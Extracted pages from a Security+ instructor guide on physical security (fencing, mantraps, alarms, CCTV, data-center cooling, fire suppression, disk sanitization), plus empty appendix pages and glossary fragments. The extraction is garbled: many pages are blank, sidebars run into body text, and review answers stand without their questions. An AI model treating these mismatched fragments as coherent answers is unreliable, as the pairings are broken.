types of physical given constraints of cost and existing infrastructure, try to plan the site using the
access controls— following principles:
barriers, gateways,
locks, alarms, and • Locate secure zones, such as equipment rooms, as deep within the building as
surveillance. possible, avoiding external walls, doors, and windows.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 541
• Use a demilitarized zone (DMZ) design for the physical space. Position public access
areas so that guests do not pass near secure zones. Security mechanisms in public
areas should be highly visible, to increase deterrence.
• Use signage and warnings to enforce the idea that security is tightly controlled.
Beyond basic no trespassing signs, some homes and offices also display signs from
the security companies whose services they are currently using. These may convince
intruders to stay away.
• Try to minimize traffic having to pass between zones. The flow of people should be
"in and out" rather than "across and between."
• Give high-traffic public areas high visibility, so that covert use of gateways, network
access ports, and computer equipment is hindered, and surveillance is simplified.
• In secure zones, do not position display screens or input devices facing toward
pathways or windows. Alternatively, use one-way glass so that no one can look in
through windows.
Sites where there is a risk of a terrorist attack will use barricades such as bollards and
security posts to prevent vehicles from approaching closely to a building at high speed.
Fencing
The exterior of a building may be protected by fencing. Security fencing needs to be
transparent (so that guards can see any attempt to penetrate it), robust (so that it is
difficult to cut), and secure against climbing (which is generally achieved by making it tall
and possibly by using razor wire). Fencing is generally effective, but the drawback is that
it gives a building an intimidating appearance. Buildings that are used by companies to
welcome customers or the public may use more discreet security methods.
Lighting
Security lighting is enormously important in contributing to the perception that a
building is safe and secure at night. Well-designed lighting helps to make people feel
safe, especially in public areas or enclosed spaces, such as parking garages. Security
lighting also acts as a deterrent by making intrusion more difficult and surveillance
(whether by camera or guard) easier. The lighting design needs to account for overall
light levels, the lighting of particular surfaces or areas (allowing cameras to perform
facial recognition, for instance), and avoiding areas of shadow and glare.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
542 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Generic examples of locks—From left to right, a standard key lock, a deadbolt lock, and an electronic
keypad lock. (Images from user macrovector © 123RF.com.)
Generic examples of a biometric thumbprint scanner lock and a token-based key card lock.
(Images from user macrovector © 123RF.com.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 543
Mantraps
Apart from being vulnerable to lock picking, the main problem with a simple door or
gate as an entry mechanism is that it cannot accurately record who has entered or left
an area. Multiple people may pass through the gateway at the same time; a user may
hold a door open for the next person; an unauthorized user may "tailgate" behind an
authorized user. This risk may be mitigated by installing a turnstile (a type of gateway
that only allows one person through at a time). The other option is to add some sort of
surveillance on the gateway. Where security is critical and cost is no object, an access
control vestibule, or mantrap, could be employed. A mantrap is where one gateway
leads to an enclosed space protected by another barrier.
Cable Locks
Cable locks attach to a secure point on the device chassis. A server chassis might come
with both a metal loop and a Kensington security slot. As well as securing the chassis
to a rack or desk, the position of the secure point prevents the chassis from being
opened, without removing the cable first.
Some types of smart cards used as passkeys for electronic locks can be vulnerable to Physical Attacks
cloning and skimming attacks: against Smart Cards
and USB
• Card cloning—this refers to making one or more copies of an existing card. A
lost or stolen card with no cryptographic protections can be physically duplicated.
Card loss should be reported immediately so that it can be revoked and a new one
issued. If there were a successful attack, it might be indicated by use of a card in a
suspicious location or time of day.
These attacks can generally only target "dumb" smart cards that transfer tokens rather
than perform cryptoprocessing. Bank-issued smart cards, referred to as EMV (Electron,
MasterCard, Visa), can also be vulnerable through the magnetic strip, which is retained
for compatibility.
When evaluating risks from card cloning and skimming, you need to realize that there are
many types of "smart card." For example, old MIFARE Classic cards used as public transit
payment cards are easily cloned because they use a weak cryptographic implementation.
Building entry systems using contactless cards with no cryptoprocessing are also vulnerable
(youtube.com/watch?v=cxxnuofREcM). Cloning of MIFARE EV or EMV smart cards that
implement a TPM-like cryptoprocessor is not thought to be possible.
Malicious USB charging cables and plugs are also a widespread problem. As with card
skimming, a device may be placed over a public charging port at airports and other
transit locations. A USB data blocker can provide mitigation against these juice-
jacking attacks by preventing any sort of data transfer when the smartphone or laptop
is connected to a charge point (zdnet.com/article/this-cheap-gadget-can-stop-your-
smartphone-or-tablet-being-hacked-at-an-airport-hotel-or-cafe).
When designing premises security, you must consider the security of entry points that Alarm Systems and
could be misused, such as emergency exits, windows, hatches, grilles, and so on. These Sensors
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
544 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
may be fitted with bars, locks, or alarms to prevent intrusion. Also consider pathways
above and below, such as false ceilings and ducting. There are five main types of alarm:
• Circuit—a circuit-based alarm sounds when the circuit is opened or closed,
depending on the type of alarm. This could be caused by a door or window opening
or by a fence being cut. A closed-circuit alarm is more secure because an open
circuit alarm can be defeated by cutting the circuit.
• Proximity—radio frequency ID (RFID) tags and readers can be used to track the
movement of tagged objects within an area. This can form the basis of an alarm
system to detect whether someone is trying to remove equipment.
Circuit-based alarms are typically suited for use at the perimeter and on windows
and doors. These may register when a gateway is opened without using the lock
mechanism properly or when a gateway is held open for longer than a defined period.
Motion detectors are useful for controlling access to spaces that are not normally
used. Duress alarms are useful for exposed staff in public areas. An alarm might simply
sound an alert or it may be linked to a monitoring system. Many alarms are linked
directly to local law enforcement or to third-party security companies. A silent alarm
alerts security personnel rather than sounding an audible alarm.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 545
The cameras in a CCTV network are typically connected to a multiplexer using coaxial
cabling. The multiplexer can then display images from the cameras on one or more
screens, allow the operator to control camera functions, and record the images to tape
or hard drive. Newer camera systems may be linked in an IP network, using regular
data cabling.
If you consider control types, a security guard is a preventive control, as the guard can both
discover and act to prevent an attack. A camera is a detective control only.
Camera systems and robotics can use AI and machine learning to implement smart
physical security (theverge.com/2018/1/23/16907238/artificial-intelligence-surveillance-
cameras-security):
• Motion recognition—the camera system might be configured with gait identification
technology. This means that the system can generate an alert when anyone moves
within sight of the camera and the pattern of their movement does not match a
known and authorized individual.
• Object detection—the camera system can detect changes to the environment, such
as a missing server, or unknown device connected to a wall port.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
546 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Intruders and/or security guards may be armed. The safety of staff and compliance
with local laws has to be balanced against the imperative to protect the company's
other resources.
It is much easier for employees to use secure behavior in these situations if they know
that their actions are conforming to a standard of behavior that has been agreed upon
and is expected of them.
Two-Person Integrity/Control
Reception areas for high-security zones might be staffed by at least two people at all
times, providing integrity for entry control and reducing the risk of insider threat.
ID Badges
A photographic ID badge showing name and (perhaps) access details is one of the
cornerstones of building security. Anyone moving through secure areas of a building
should be wearing an ID badge; anyone without an ID badge should be challenged.
Color-coding could be used to make it obvious to which zones a badge is granted
access.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 547
Review Activity:
Physical Site Security Controls
Answer the following questions:
Lighting is one of the most effective deterrents. Any highly visible security control
(guards, fences, dogs, barricades, CCTV, signage, and so on) will act as a deterrent.
One type of proximity reader allows a lock to be operated by a contactless smart card.
Proximity sensors can also be used to track objects via RFID tags.
3. What are the two main options for mobile camera surveillance?
A USB data blocker can be attached to the end of a cable to prevent a charging port
from trying to make a data connection.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
548 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 21B
Explain the Importance of Physical
Host Security Controls
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 549
Some data centers may contain racks with equipment owned by different companies
(colocation). These racks can be installed inside cages so that technicians can only
physically access the racks housing their own company's servers and appliances.
Colocation cages. (Image © Chris Dag and shared with CC BY 2.0 flickr.com/photos/
chrisdag/865711871.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
550 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A hardened PDS is one where all cabling is routed through sealed metal conduit and
subject to periodic visual inspection. Lower-grade options are to use different materials
for the conduit (plastic, for instance). Another option is to install an alarm system within
the cable conduit, so that intrusions can be detected automatically.
It is possible to install communications equipment within a shielded enclosure,
known as a Faraday Cage. The cage is a charged conductive mesh that blocks
signals from entering or leaving the area. The risk of eavesdropping from leakage
of electromagnetic signals was investigated by the US DoD who defined TEMPEST
(Transient Electromagnetic Pulse Emanation Standard) as a means of shielding the
signals.
Some data centers (notably those operated by Google) are allowing higher temperatures
(up to around 26°C/80°F). This can achieve significant energy cost savings and modern
electronics is proving reliable at this temperature.
The positive air pressure created by the HVAC system also forces contaminants such as
dust out of the facility. Filters on HVAC systems collect the dust and must be changed
regularly. When using an air conditioning system, ensure that it is inspected and
maintained periodically. Systems may be fitted with alarms to alert staff to problems.
Mission critical systems may require a backup air conditioning system.
The server room should not be used as storage space. Do not leave boxes or unused
equipment in it. Also, do not install unnecessary devices that generate a lot of heat and
dust, such as printers.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 551
A data center or server room should be designed in such a way as to maximize air flow Hot and Cold Aisles
across the server or racks. If multiple racks are used, install equipment so that servers
are placed back-to-back not front-to-back, so that the warm exhaust from one bank of
servers is not forming the air intake for another bank. This is referred to as a hot aisle/
cold aisle arrangement. In order to prevent air leaks from the hot aisle to the cold
aisle, ensure that any gaps in racks are filled by blank panels and use strip curtains or
excluders to cover any spaces above or between racks.
Hot aisle containment design—Cold air circulates from the air conditioner under the floor and around
the rack, while hot air is drawn from between the racks through the ceiling space (plenum) to a heat
exchanger. In this design, it is important that hot air does not leak from the ceiling or from the floor
space between the racks. (Image © 123RF.com.)
Make sure that cabling is secured by cable ties or ducting and does not run across
walkways. Cable is best run using a raised floor. If running cable through plenum
spaces, make sure it is fire-retardant and be conscious of minimizing proximity to
electrical sources, such as electrical cable and fluorescent light, which can corrupt data
signals (Electromagnetic Interference [EMI]). You also need to ensure that there is
sufficient space in the plenum for the air conditioning system to work properly—filling
the area with cable is not the best idea.
To reduce interference, data/network cabling should not be run parallel to power cabling. If
EMI is a problem, shielded cabling can be installed. Alternatively, the copper cabling could
be replaced with fiber optic cabling, which is not susceptible to EMI.
Health and safety legislation dictates what mechanisms an organization must put in Fire Detection and
place to detect and suppress fires. Some basic elements of fire safety include: Suppression
• Well-marked fire exits and an emergency evacuation procedure that is tested and
practiced regularly.
• Building design that does not allow fire to spread quickly, by separating different
areas with fire-resistant walls and doors.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
552 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Automatic smoke or fire detection systems, as well as alarms that can be operated
manually.
Fire suppression systems work on the basis of the fire triangle. The fire triangle
works on the principle that a fire requires heat, oxygen, and fuel to ignite and burn.
Removing any one of those elements provides fire suppression (and prevention). In
the US (and most other countries), fires are divided by class under the NFPA (National
Fire Protection Association) system, according to the combustible material that fuels
the fire. Portable fire extinguishers come in several different types, with each type
being designed for fighting a particular class of fire. Notably, Class C extinguishers use
gas-based extinguishing and can be used where the risk of electric shock makes other
types unsuitable.
Premises may also be fitted with an overhead sprinkler system. Wet-pipe sprinklers
work automatically, are triggered by heat, and discharge water. Wet-pipe systems
constantly hold water at high pressure, so there is some risk of burst pipes and
accidental triggering, as well as the damage that would be caused in the event of
an actual fire. There are several alternatives to wet-pipe systems that can minimize
damage that may be caused by water flooding the room.
• Dry-pipe—these are used in areas where freezing is possible; water only enters this
part of the system if sprinklers elsewhere are triggered.
• Pre-action—a pre-action system only fills with water when an alarm is triggered;
it will then spray when the heat rises. This gives protection against accidental
discharges and burst pipes and gives some time to contain the fire manually before
the sprinkler operates.
• Halon—gas-based systems have the advantage of not short circuiting electrical
systems and leaving no residue. Up until a few years ago, most systems used Halon
1301. The use of Halon has been banned in most countries as it is ozone depleting,
though existing installations have not been replaced in many instances and can
continue to operate legally.
• Clean agent—alternatives to Halon are referred to as "clean agent." As well as not
being environmentally damaging, these gases are considered nontoxic to humans.
Examples include INERGEN (a mixture of CO2, argon, and nitrogen), FM-200/HFC-
227, and FE-13. The gases both deplete the concentration of oxygen in the area
(though not to levels dangerous to humans) and have a cooling effect. CO2 can be
used too, but it is not safe for use in occupied areas.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 553
Files deleted from a magnetic-type hard disk are not erased. Rather, the sectors are Data Sanitization Tools
marked as available for writing and the data they contain will only be removed as new
files are added. Similarly, using the standard Windows format tool will only remove Teaching
references to files and mark all sectors as usable. Tip
The standard method of sanitizing an HDD is called overwriting. This can be performed It seems fitting to
end the course with
using the drive's firmware tools or a utility program. The most basic type of overwriting irrevocable techniques
is called zero filling, which just sets each bit to zero. Single pass zero filling can leave to utterly destroy
patterns that can be read with specialist tools. A more secure method is to overwrite information!
the content with one pass of all zeros, then a pass of all ones, and then a third pass in a
pseudorandom pattern. Some secret service agencies require more than three passes.
Overwriting can take a considerable amount of time to complete, depending on the
number of passes.
Active KillDisk data wiping software. (Screenshot used with permission from LSoft Technologies, Inc.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
554 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Examples of tools supporting secure file or disk erasing include Sdelete (part of Sysinternals
docs.microsoft.com/sysinternals) and Darik's Boot and Nuke (dban.org), plus the Active
KillDisk suite shown here.
If the device firmware does not support encryption, using a software disk encryption
product and then destroying the key and using SE should be sufficient for most
confidentiality requirements.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 555
Review Activity:
Physical Host Security Controls
Answer the following questions:
This can be described as an air gap or secure area demilitarized zone (DMZ).
2. Where would you expect to find "hot and cold" aisles and what is their
purpose?
This layout is used in a data center or large server room. The layout is the best way to
maintain a stable temperature and reduce loss of availability due to thermal problems.
Make conduit physically difficult to access, use alarms to detect attempts to interfere
with conduit, and use shielded cabling.
4. What physical security device could you use to ensure the safety of onsite
backup tapes?
A crypto erase or Instant Secure Erase (ISE) sanitizes media by encrypting the data and
then erasing the crytpographic key.
Degaussing is ineffective against all types of flash media, including thumb drives, SSDs,
hybrid drives, and memory cards.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
556 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Lesson 21
Summary
Teaching You should be able to explain the importance of physical security controls for access,
Tip surveillance, environmental protection, and secure data destruction.
Check that students
are confident about
the content that has
Guidelines for Physical Security Controls
been covered. If there
Follow these guidelines for deploying or upgrading physical security controls:
is time, revisit any
content examples that • If possible, design sites as zones to maximize access controls and surveillance for
they have questions the most secure areas, using industrial camouflage, DMZs, air gaps, vaults, and safes
about. If you have
used all the available
where applicable.
time for this lesson
block, note the issues,
• Secure the site perimeter and access points using fencing, barricades/bollards, and
and schedule time for locks (physical, electronic, and biometric). If using smart cards, use a type that is
a review later in the resistant to cloning/skimming.
course.
• Monitor the site using security guards, CCTV, robot sentries, and drones/UAV, and
use effective lighting to maximize surveillance.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A
Mapping Course Content to CompTIA
Security+ (Exam SY0-601)
Achieving CompTIA Security+ certification requires candidates to pass Exam SY0-601.
This table describes where the exam objectives for Exam SY0-601 are covered in this
course.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
A-2 | Appendix A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A | A-3
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
A-4 | Appendix A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A | A-5
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
A-6 | Appendix A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A | A-7
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
A-8 | Appendix A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A | A-9
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
A-10 | Appendix A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A | A-11
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
A-12 | Appendix A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A | A-13
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
A-14 | Appendix A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A | A-15
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
A-16 | Appendix A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A | A-17
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
A-18 | Appendix A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A | A-19
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
A-20 | Appendix A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A | A-21
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
A-22 | Appendix A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A | A-23
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
A-24 | Appendix A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A | A-25
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
A-26 | Appendix A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A | A-27
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
A-28 | Appendix A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A | A-29
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
A-30 | Appendix A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A | A-31
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
A-32 | Appendix A
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Appendix A | A-33
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Glossary
AAA (authentication, authorization, air gap A type of network isolation that
and accounting) A security concept physically separates a network from all
where a centralized platform verifies other networks.
subject identification, ensures the subject AIS (Automated Indicator Sharing)
is assigned relevant permissions, and Threat intelligence data feed operated by
then logs these actions to create an audit the DHS.
trail.
ALE (annual loss expectancy) The
ABAC (attribute-based access control) total cost of a risk to an organization on
An access control technique that an annual basis. This is determined by
evaluates a set of attributes that each multiplying the SLE by the annual rate of
subject possesses to determine if access occurrence (ARO).
should be granted.
AP (access point) A device that provides
account policies A set of rules governing a connection between wireless devices
user security information, such as and can connect to wired networks. Also
password expiration and uniqueness, known as wireless access point or WAP.
which can be set globally.
API (application programming
ACL (Access Control List) A collection interface) A library of programming
of access control entries (ACEs) that utilities used, for example, to enable
determines which subjects (user accounts, software developers to access functions
host IP addresses, and so on) are allowed of the TCP/IP network stack under a
or denied access to the object and the particular operating system.
privileges given (read only, read/write, and
so on). application aware firewall A Layer 7
firewall technology that inspects packets
active defense The practice of at the Application layer of the OSI model.
responding to a threat by destroying or
deceiving a threat actor's capabilities. application firewall Software designed
to run on a server to protect a particular
adversarial AI (adversarial artificial application such as a web server or SQL
intelligence) Using AI to identify server.
vulnerabilities and attack vectors to
circumvent security systems. APT (advanced persistent threat) An
attacker's ability to obtain, maintain, and
AES (Advanced Encryption Standard) diversify access to network systems using
A symmetric 128-, 192-, or 256-bit block exploits and malware.
cipher based on the Rijndael algorithm
developed by Belgian cryptographers Joan Arduino Open-source platform producing
Daemen and Vincent Rijmen and adopted programmable circuit boards for
by the U.S. government as its encryption education and industrial prototyping.
standard to replace DES. ARO (annual rate of occurrence) In
Agile model (Agile) A software risk calculation, an expression of the
development model that focuses on probability/likelihood of a risk as the
iterative and incremental development number of times per year a particular loss
to account for evolving requirements and is expected to occur.
expectations. ARP inspection An optional security
AH (authentication header) An IPSec feature of a switch that prevents excessive
protocol that provides authentication for the ARP replies from flooding a network
origin of transmitted data as well as integrity segment.
and protection against replay attacks.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
G-2 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Glossary | G-3
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
G-4 | Glossary
CCMP (counter mode with cipher block cloud deployment model Classifying the
chaining message authentication code ownership and management of a cloud as
protocol) An encryption protocol used public, private, community, or hybrid.
for wireless LANs that addresses the
Cloud Security Alliance Industry
vulnerabilities of the WEP protocol.
body providing security guidance to
CE (cryptographic erase) A method CSPs, including enterprise reference
of sanitizing a self-encrypting drive by architecture and security controls matrix.
erasing the media encryption key.
cloud service model Classifying the
chain of custody The record of evidence provision of cloud services and the limit of
history from collection, to presentation in the cloud service provider's responsibility
court, to disposal. as software, platform, infrastructure,
and so on. clustering A load balancing
change control The process by which
technique where a group of servers are
the need for change is recorded and
configured as a unit and work together to
approved.
provide network services.
change management The process
CN (common name) An X500 attribute
through which changes to the
expressing a host or user name, also
configuration of information systems are
used as the subject identifier for a digital
implemented, as part of the organization's
certificate.
overall configuration management efforts.
COBO (corporate owned, business only)
CHAP (Challenge Handshake
Enterprise mobile device provisioning
Authentication Protocol) Authentication
model where the device is the property
scheme developed for dial-up networks
of the organization and personal use is
that uses an encrypted three-way
prohibited.
handshake to authenticate the client
to the server. The challenge-response code of conduct Professional behavior
is repeated throughout the connection depends on basic ethical standards,
(though transparently to the user) to such as honesty and fairness. Some
guard against replay attacks. professions may have developed codes of
ethics to cover difficult situations; some
checksum The output of a hash function.
businesses may also have a code of ethics
chmod Linux command for managing file
to communicate the values it expects its
permissions.
employees to practice. Also known as
CIA triad (confidentiality, integrity, ethics.
and availability) The three principles of
code reuse Potentially unsecure
security control and management. Also
programming practice of using code
known as the information security triad.
originally written for a different context.
or AIC triad.
code signing The method of using a
circuit-level stateful inspection firewall
digital signature to ensure the source and
A Layer 5 firewall technology that tracks
integrity of programming code.
the active state of a connection, and can
make decisions based on the contents of cold site A predetermined alternate
network traffic as it relates to the state of location where a network can be rebuilt
the connection. after a disaster.
CIS (Center for Internet Security) A not- collector A network appliance that
for-profit organization (founded partly by gathers or receives log and/or state data
SANS). It publishes the well-known "Top from other network systems.
20 Critical Security Controls" (or system
collision In cryptography, the act of two
design recommendations).
different plaintext inputs producing the
clean desk policy An organizational same exact ciphertext output.
policy that mandates employee work
community cloud A cloud that is
areas be free from potentially sensitive
deployed for shared use by cooperating
information; sensitive documents must
tenants.
not be left out where unauthorized
personnel might see them.
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Glossary | G-5
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
G-6 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Glossary | G-7
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
G-8 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Glossary | G-9
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
G-10 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Glossary | G-11
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
G-12 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Glossary | G-13
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
G-14 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Glossary | G-15
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
G-16 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Glossary | G-17
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
G-18 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Glossary | G-19
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
G-20 | Glossary
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Glossary | G-21
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
G-22 | Glossary
SFTP (Secure File Transfer Protocol) SIP (Session Initiation Protocol) Used
A secure version of the File Transfer to establish, disestablish, and manage
Protocol that uses a Secure Shell (SSH) VoIP and conferencing communications
tunnel as an encryption method to sessions. It handles user discovery
transfer, access, and manage files. (locating a user on the network),
availability advertising (whether a user
SHA (Secure Hash Algorithm) A
is prepared to receive calls), negotiating
cryptographic hashing algorithm created
session parameters (such as use of audio/
to address possible weaknesses in MDA.
video), and session management and
The current version is SHA-2.
termination.
shadow IT Computer hardware, software,
SLA (service level agreement) Operating
or services used on a private network
procedures and standards for a service
without authorization from the system
contract.
owner.
SLE (single loss expectancy) The amount
shared account An account with no
that would be lost in a single occurrence
credential (guest) or one where the
of a particular risk factor.
credential is known to multiple persons.
smart card A device similar to a credit
shellcode Lightweight block of malicious
card that can store authentication
code that exploits a software vulnerability
information, such as a user's private key,
to gain initial access to a victim system.
on an embedded microchip.
shimming The process of developing and
smart meter A utility meter that can
implementing additional code between an
submit readings to the supplier without
application and the operating system to
user intervention.
enable functionality that would otherwise
be unavailable. SMiShing A form of phishing that uses
SMS text messages to trick a victim into
shoulder surfing A social engineering
revealing information.
tactic to obtain someone's password or
PIN by observing him or her as he or she sn1per Software utility designed for
types it in. penetration testing reporting and
evidence gathering that can also run
SID (security identifier) The value
automated test suites.
assigned to an account by Windows and
that is used by the operating system to SNMP (Simple Network Management
identify that account. Protocol) Protocol for monitoring and
managing network devices. SNMP works
SIEM (security information and event
over UDP ports 161 and 162 by default.
management) A solution that provides
real-time or near-real-time analysis of SOA (service-oriented architecture) A
security alerts generated by network software architecture where components
hardware and applications. of the solution are conceived as loosely
coupled services not dependent on a
signature-based detection A network
single platform type or technology.
monitoring system that uses a predefined
set of rules provided by a software vendor SOAP (Simple Object Access Protocol)
or security personnel to identify events An XML-based web services protocol that
that are unacceptable. is used to exchange messages.
SIM (subscriber identity module) A SOAR (security orchestration,
small chip card that identifies the user automation, and response) A class of
and phone number of a mobile device, security tools that facilitates incident
via an International Mobile Subscriber response, threat hunting, and security
Identity (ISMI). configuration by orchestrating automated
runbooks and delivering data enrichment.
sinkhole A DoS attack mitigation strategy
that directs the traffic that is flooding a SoC (system-on-chip) A processor that
target IP address to a different network integrates the platform functionality of
for analysis. multiple logical controllers onto a single
chip.
Glossary
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Glossary | G-23
spear phishing An email-based or web- state actor A type of threat actor that
based form of phishing which targets is supported by the resources of its host
specific individuals. country's military and security services.
Also known as nation state actor.
SPIM (spam over internet messaging)
A spam attack that is propagated through state table Information about sessions
instant messaging rather than email. between hosts that is gathered by a
stateful firewall.
split tunnel VPN configuration where
only traffic for the private network is stateful inspection A technique used
routed via the VPN gateway. in firewalls to analyze packets down to
the application layer rather than filtering
SPoF (single point of failure) A
packets only by header information,
component or system that would cause
enabling the firewall to enforce tighter
a complete interruption of a service if it
and more security.
failed.
steganography A technique for obscuring
SQL injection (Structured Query
the presence of a message, often by
Language injection) An attack that
embedding information within a file or
injects a database query into the input
other entity.
data directed at a server by accessing the
client side of the application. STIX (Structured Threat Information
eXpression) A framework for analyzing
SSAE SOC (Statements on Standards
cybersecurity incidents.
for Attestation Engagements
Service Organization Control) Audit stored procedure One of a set of pre-
specifications designed to ensure that compiled database statements that can
cloud/hosting providers meet professional be used to validate input to a database.
standards. A SOC2 Type II report is
STP (Spanning Tree Protocol) A switching
created for a restricted audience, while
protocol that prevents network loops by
SOC3 reports are provided for general
dynamically disabling links as needed.
consumption.
stream cipher A type of symmetric
SSH (Secure Shell) A remote
encryption that combines a stream
administration and file-copy program that
of plaintext bits or bytes with a
supports VPNs by using port forwarding,
